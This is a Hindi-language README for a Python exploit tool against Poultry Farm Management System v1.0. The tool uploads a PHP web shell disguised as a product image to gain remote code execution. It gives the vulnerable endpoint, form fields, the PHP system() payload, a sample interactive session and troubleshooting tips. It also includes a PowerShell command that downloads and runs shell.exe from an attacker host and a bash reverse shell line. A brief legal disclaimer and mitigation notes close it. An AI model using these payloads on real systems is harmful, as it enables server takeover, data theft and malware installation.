
पोल्ट्री फार्म मैनेजमेंट सिस्टम v1.0 में फ़ाइल अपलोड के माध्यम से अनधिकृत रिमोट कोड निष्पादन के लिए पायथन एक्सप्लॉइट। कमज़ोर लक्ष्यों पर मनमाना सिस्टम कमांड निष्पादित करने के लिए PHP शैल अपलोड करता है।
अनप्रमाणित फ़ाइल अपलोड जिसमें दूरस्थ कोड निष्पादन शामिल है
पोल्ट्री फार्म प्रबंधन प्रणाली v1.0 में उत्पाद अपलोड कार्यक्षमता में एक गंभीर कमजोरी है। एप्लिकेशन फ़ाइल अपलोड को ठीक से मान्य और स्वच्छ करने में विफल रहता है, जिससे हमलावर PHP फ़ाइलों को उत्पाद छवियों के रूप में प्रच्छन्न करके अपलोड कर सकते हैं। ये अपलोड की गई PHP फ़ाइलें निष्पादित हो सकती हैं, जिससे दूरस्थ कोड निष्पादन प्राप्त किया जा सकता है।
POST /paultry/farm/product.php or POST /farm/product.php
इस कमजोरी का शोषण निम्नलिखित तरीके से किया जा सकता है:
requests लाइब्रेरीcolorama लाइब्रेरी (रंगीन आउटपुट के लिए)pip install requests colorama
या सभी निर्भरताएँ स्थापित करें:
pip install -r requirements.txt
स्क्रिप्ट को इंटरैक्टिव रूप से चलाएँ:
python exploit.py
स्क्रिप्ट आपसे निम्नलिखित के लिए संकेत देगी:
==================================================
Interactive Backdoor Upload Tool
==================================================
Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami
==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes
✅ इंटरैक्टिव इनपुट - IP, पोर्ट और कस्टम कमांड के लिए संकेत देता है
✅ डिफ़ॉल्ट मान - सुविधा के लिए उपयुक्त डिफ़ॉल्ट मान
✅ रंग-कोडित आउटपुट - पढ़ने में आसान रंगीन टर्मिनल आउटपुट
✅ पुष्टिकरण चरण - निष्पादन से पहले सेटिंग्स सत्यापित करें
✅ त्रुटि प्रबंधन - असफल अनुरोधों के लिए सुव्यवस्थित त्रुटि संदेश
✅ लचीले कमांड - किसी भी शेल कमांड या PowerShell पेलोड के लिए समर्थन
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/ में संग्रहीत होती हैsystem() फ़ंक्शन के माध्यम से कमांड निष्पादन ट्रिगर होता हैPOST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
शोषण का परीक्षण निम्नलिखित पर किया गया:
⚠️ कानूनी चेतावनी
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है।
सॉफ़्टवेयर अपडेट करें - यदि उपलब्ध हों तो सुरक्षा पैच लागू करें
फ़ाइल अपलोड सत्यापन
कॉन्फ़िगरेशन
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
पहुँच नियंत्रण
निगरानी
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly
समस्याओं, प्रश्नों या सुधारों के लिए, GitHub रिपॉजिटरी या Exploit-DB पेज देखें।
अंतिम अद्यतन: दिसंबर 2024
स्थिति: सत्यापित और परीक्षित